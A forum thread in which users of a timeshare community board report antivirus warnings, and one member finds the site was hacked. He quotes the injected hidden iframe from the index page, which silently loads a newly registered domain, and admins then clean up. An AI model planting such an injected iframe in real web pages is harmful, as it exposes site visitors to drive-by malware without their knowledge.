# Anyone else getting Malware notices?



## Jim Bryan

Tried three times today getting on TUG and get a notice that my spyware has blocked a malware situation on TUG.


----------



## DeniseM

Someone else emailed me about this today, but I don't know if there is a problem or not.  I am on a Mac, so I don't get those kinds of notices.



> * MSIE Java Deployment Toolkit Input Invalidation *
> 
> Severity: High
> This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.DescriptionThis signature will detect a Insufficient Validation vulnerability in Java Deployment Toolkit ActiveX Control.
> Additional InformationJava Deployment Toolkit Performs Insufficient Validation of Parameters



I am sure an Admin will look into this and let us know.


----------



## TUGBrian

Doug and I have gone over this in great detail...and there is simply nothing in vbulletin (or the forum) that even uses JAVA.

Wish I had a better theory for you, but the best we can come up with atm is that some virus software's have downloaded a new scan definition package that picks up something as a false positive.


----------



## Makai Guy

The page that has been reported to me is the BBS main page at www.tugbbs.com.   Is this where you are seeing this?

That report refers to Java, which is not used by the BBS at all (JavaSCRIPT, which the bbs does use, is a different animal altogether). 

I suspect this a just a false positive, generated by a new set of virus definitions downloaded to the security program.


----------



## Numismatist

I reported it earlier, Symantec says it is a high threat alert.  I get it at work, but not here at home.


----------



## timeos2

*Its a local cleanup needed*



Numismatist said:


> I reported it earlier, Symantec says it is a high threat alert.  I get it at work, but not here at home.



It is a local PC issue not a BBS issue. DO NOT load/accept any type pf program it says you need to "clean it up" as it will be something even worse. Run a full cleanup of your hard drive - not with Norton as they are notoriously compromised by any respectable virus/spyware - and pay special attention to the SmitFruad virus and it's mates. You may need to remove the drive & scan with as a slave on a second PC. Also before you cleanup make sure to turn off "System Restore" as the problem programs know about that and hide there to reappear at the next boot up.

If all of this is strange to you you need a PC person to clean it up for you.


----------



## MollyBuzz

I'm getting it too, only when I visit tugbbs..I found this, don't kbnwo if it will help out any troubleshooting..
http://www.sitepoint.com/forums/showthread.php?t=691290

It deals with other vbulletin forums getting the same thing...


----------



## timeos2

MollyBuzz said:


> I'm getting it too, only when I visit tugbbs..I found this, don't kbnwo if it will help out any troubleshooting..
> http://www.sitepoint.com/forums/showthread.php?t=691290
> 
> It deals with other vbulletin forums getting the same thing...



The fact that only some machines "see" it means that the issue is local - your PC - being triggered by a common action from vBulletin software.  It is still a local problem to fix.


----------



## Makai Guy

Repeat from earlier in this thread:


Makai Guy said:


> The page that has been reported to me is the BBS main page at www.tugbbs.com.   *Is this where you are seeing this?*



We obviously can't investigate very well if we don't know what page triggers the warning.

Also, please update whichever program you use that is reporting the problem, see if you still get the warning, and report back.


----------



## Numismatist

I get it when I load tugbbs.com every time (having been on another site before that), so it's the first time going to tugbbs.  I have Norton 360 at work where it happens.  Here, at home, I have Norton Internet Security (a slightly different version) and it does NOT happen here.

Clearly, it's a combination of the virus program and something on TUG, I don't get the message on any other website I go to.

Hope this helps.


----------



## ace2000

*Slightly* off-topic, but this is a great site for checking out web site addresses for viruses...  just type in the address.

http://safeweb.norton.com/

Results for TUG...

http://safeweb.norton.com/report/show?url=www.tug2.net


----------



## Jim Bryan

I have Avast and I get a blocked Malware notice when I get on TUG and again when I get on TUG BBS, third day in a row. Just started.

Says its

HTML:Iframe.inf


----------



## cotraveller

Windows 7, Internet Explorer 8, Norton from Comcast, Norton Security Suite, Version 4.2.0.12.  It says the latest definitions update occurred 2 minutes ago.  I'm not sure how often it does that.

I do not receive any adverse notices about TUG, either on the main site or the BBS.  I can't recall ever receiving one in the past either.


----------



## Makai Guy

ace2000 said:


> *Slightly* off-topic, but this is a great site for checking out web site addresses for viruses...  just type in the address.
> 
> http://safeweb.norton.com/
> 
> Results for TUG...
> 
> http://safeweb.norton.com/report/show?url=www.tug2.net



Thanks, that looks like a useful link.

Those are the results for the TUG home page at www.tug2.net.  When I visited the result page, it showed no threats.

While there, I ran the check for the bbs main page at www.tugbbs.com, and it also showed no threats.

Once again, I believe these were false positives that have been resolved as the utilities updated their signature files.


----------



## BellaWyn

Noticed this thread when it first went up.  I use Mozilla so I wasn't getting anything. Loaded the tugbbs.com up tonight in IE 8 and got the block warning for Malware through my Webroot.

Could this be an IE issue?


----------



## timeos2

BellaWyn said:


> Noticed this thread when it first went up.  I use Mozilla so I wasn't getting anything. Loaded the tugbbs.com up tonight in IE 8 and got the block warning for Malware through my Webroot.
> 
> Could this be an IE issue?



NEVER use IE - except for Windows updates I would take it off my PC's - so that hadn't occurred to me. Just tried it - no errors or warnings and Trend Micro reports it as a "safe page" just as it does from Mozilla Firefox which I use 99.9% of the time.  Good thought to check it.


----------



## Ken555

TUG tried redirecting to eiueuiuewi.com for me just now (Monday @ 9:45am Pacific). Several attempts to login resulted in the same redirect, and then it just worked. 

I'm using a Mac with Firefox (latest version). 

This has been reported elsewhere as a hack of the vBulletin server. See post #4 on this thread (this is a recent thread) for details:

http://www.sitepoint.com/forums/showthread.php?t=691290

Here's another:

http://www.experts-exchange.com/Virus_and_Spyware/Internet_Security/Q_26352292.html

The problem, as reported in these threads, is due to FTP access being compromised on the server. 

I hope you have a good backup of TUG.


----------



## TUGBrian

Ken555 said:


> TUG tried redirecting to eiueuiuewi.com for me just now (Monday @ 9:45am Pacific). Several attempts to login resulted in the same redirect, and then it just worked.
> 
> I'm using a Mac with Firefox (latest version).
> 
> This has been reported elsewhere as a hack of the vBulletin server. See post #4 on this thread (this is a recent thread) for details:
> 
> http://www.sitepoint.com/forums/showthread.php?t=691290
> 
> Here's another:
> 
> http://www.experts-exchange.com/Virus_and_Spyware/Internet_Security/Q_26352292.html
> 
> The problem, as reported in these threads, is due to FTP access being compromised on the server.
> 
> I hope you have a good backup of TUG.



I dont see anything close to this where listed on the server (pehraps doug can look in places I cant though).

Id also think this woudl impact 100% of the users if it were truly compromised?


----------



## TUGBrian

TUGBrian said:


> I dont see anything close to this where listed on the server (pehraps doug can look in places I cant though).
> 
> Id also think this woudl impact 100% of the users if it were truly compromised?





also...when you report issues, its very important to specify the page/url you were trying to go to when experiencing the problem.

"TUG" consists of nearly half a dozen different servers and sites.

Thanks!


----------



## Ken555

TUGBrian said:


> also...when you report issues, its very important to specify the page/url you were trying to go to when experiencing the problem.
> 
> "TUG" consists of nearly half a dozen different servers and sites.
> 
> Thanks!




Just tried logging back in and had the same problem. I was able to eventually login by going to tugbbs.com/forums/. I normally just go to www.tugbbs.com.

Here's the page source for the default HTML page on tugbbs.com showing that the site has apparently been hacked (why else would it go to this other site?).

<head>
<meta http-equiv="refresh" content="0; url=http://tugbbs.com/forums/" />
</head><iframe src="http://eiueuiuewi.com/54N7JS34B34D5NH34J/" width="4" height="2"></iframe>

Domain reg info on this domain shows it's in China, and is a brand new domain. Not a good feeling about this one.


Domain name: eiueuiuewi.com

Registrant Contact:
   Whois Privacy Protection Service
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Administrative Contact:
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Technical Contact:
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Billing Contact:
   Whois Agent zywrlbhjdk@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

DNS:
ns1.google.com
ns2.google.com

Created: 2010-07-16
Expires: 2011-07-16


----------



## TUGBrian

working on this now


----------



## TUGBrian

TUGBrian said:


> working on this now



try to access tugbbs.com now...see if the error has gone away.


----------



## Makai Guy

Ken555 said:


> Just tried logging back in and had the same problem. I was able to eventually login by going to tugbbs.com/forums/. I normally just go to www.tugbbs.com.
> 
> Here's the page source for the default HTML page on tugbbs.com showing that the site has apparently been hacked (why else would it go to this other site?).


Thanks, Ken, that was VERY helpful and helped to pin down the problem.  All of my shortcut links to the bbs go the the ../forums location so the potential problem with the file that redirects from tugbbs.com to tugbbs.com/forums never occurred to me.


----------



## Ken555

TUGBrian said:


> try to access tugbbs.com now...see if the error has gone away.



Nope, it's still there as of 11:27am Pacific. Be sure you change your FTP passwords, since that was what the reported issue was elsewhere (strong passwords, etc).


----------



## TUGBrian

Ken555 said:


> Nope, it's still there as of 11:27am Pacific. Be sure you change your FTP passwords, since that was what the reported issue was elsewhere (strong passwords, etc).



all passwords have been changed, and all files have been restored.

files were replaced at 2:03pm eastern time...ive just confirmed the files do not contain the code at the bottom....refresh please?


----------



## Ken555

Makai Guy said:


> Thanks, Ken, that was VERY helpful and helped to pin down the problem.  All of my shortcut links to the bbs go the the ../forums location so the potential problem with the file that redirects from tugbbs.com to tugbbs.com/forums never occurred to me.



Glad to be of help. Many of these automated/semi-manual hacks focus on the top level of a site (this is a fairly amateurish hack from what I can see, though you should do a full security audit to verify and keep a secure backup offline).  Adding an iframe to an existing file proves they were able to compromise your security, so chances are someone who has admin privileges has a weak password.


----------



## Ken555

TUGBrian said:


> all passwords have been changed, and all files have been restored.
> 
> files were replaced at 2:03pm eastern time...ive just confirmed the files do not contain the code at the bottom....refresh please?



Yes, it's working (tried with another browser). Thanks.


----------



## Numismatist

Anyone know if this did anything to our computers (as users)?


----------



## Ken555

Numismatist said:


> Anyone know if this did anything to our computers (as users)?



It didn't affect my Mac, but if you're on Windows I'd suggest doing a full scan (can't hurt).


----------



## TUGBrian

Ken555 said:


> Glad to be of help. Many of these automated/semi-manual hacks focus on the top level of a site (this is a fairly amateurish hack from what I can see, though you should do a full security audit to verify and keep a secure backup offline).  Adding an iframe to an existing file proves they were able to compromise your security, so chances are someone who has admin privileges has a weak password.



oddly enough, they modified the index.html file of all the sites hosted on that server...and all of them use different usernames and passwords.

all admin passwords were changed as well...just to be on the safe side.


----------



## Ken555

TUGBrian said:


> oddly enough, they modified the index.html file of all the sites hosted on that server...and all of them use different usernames and passwords.
> 
> all admin passwords were changed as well...just to be on the safe side.



Then you should file a tech complaint with the host provider (assuming you host it) since someone's password (who may have root access) was compromised. If it wasn't one of your passwords, the you haven't fixed the problem.


----------



## TUGBrian

TUGBrian said:


> oddly enough, they modified the index.html file of all the sites hosted on that server...and all of them use different usernames and passwords.
> 
> all admin passwords were changed as well...just to be on the safe side.



I clicked the link in the code...and it didnt do anything that my computer picked up.

ive no idea what that site is in the first place...nor what the link does.

perhaps it merely flags a site that has been successfully compromised?


----------



## Ken555

TUGBrian said:


> I clicked the link in the code...and it didnt do anything that my computer picked up.
> 
> ive no idea what that site is in the first place...nor what the link does.
> 
> perhaps it merely flags a site that has been successfully compromised?



Could be. It only opened a small square image, so this could be the preliminary step toward a full attack... hmm, that's a pleasant thought.


----------



## TUGBrian

Ken555 said:


> Then you should file a tech complaint with the host provider (assuming you host it) since someone's password (who may have root access) was compromised. If it wasn't one of your passwords, the you haven't fixed the problem.



every password that had any sort of access to the server was changed.

There are only two people that im aware of that even know what these passwords were in the first place.

Granted some of them had been the same ones for many...many years.

Either way, the tech was able to identify the IP that uploaded the files...as well as the usernames used to upload them.  the IP was blocked...and files restored...and all passwords changed (including the root password).


----------



## Ken555

TUGBrian said:


> Either way, the tech was able to identify the IP that uploaded the files...as well as the usernames used to upload them.  the IP was blocked...and files restored...and all passwords changed (including the root password).



Excellent. Thanks for quickly addressing this, Brian.


----------



## TUGBrian

Ken555 said:


> Excellent. Thanks for quickly addressing this, Brian.



also note that should anything catastrophic happen, we do back up all tug servers remotely each night.


----------



## taffy19

Numismatist said:


> Anyone know if this did anything to our computers (as users)?



I am also questioning if it hurts the PC as I noticed the re-direct to that strange website this morning on the Dell as well as the Mac.  The PC is acting very slow and Dell will call me back again in two hours because I had to leave.  Do I need to do a full virus scan with Panda IS but that takes so long.  I have Malbytes too that Dell installed after the Facebook virus.

Do we need to change our password too here and at home even if they are different?


----------



## TUGBrian

I cant find anything on the site at all, nor do any of my malware/virus scanners pick anything up on my pc that I visitited the site on either.

id certainly schedule a full scan to be on the safe side however.


----------



## Jim Bryan

TUGBrian said:


> also...when you report issues, its very important to specify the page/url you were trying to go to when experiencing the problem.
> 
> "TUG" consists of nearly half a dozen different servers and sites.
> 
> Thanks!



I posted this earlier

I have Avast and I get a blocked Malware notice when I get on TUG and again when I get on TUG BBS, third day in a row. Just started.

Says its

HTML:Iframe.inf


----------



## Jim Bryan

Must be fixed, I didn't get a warning when I just got on. Thank you!


----------

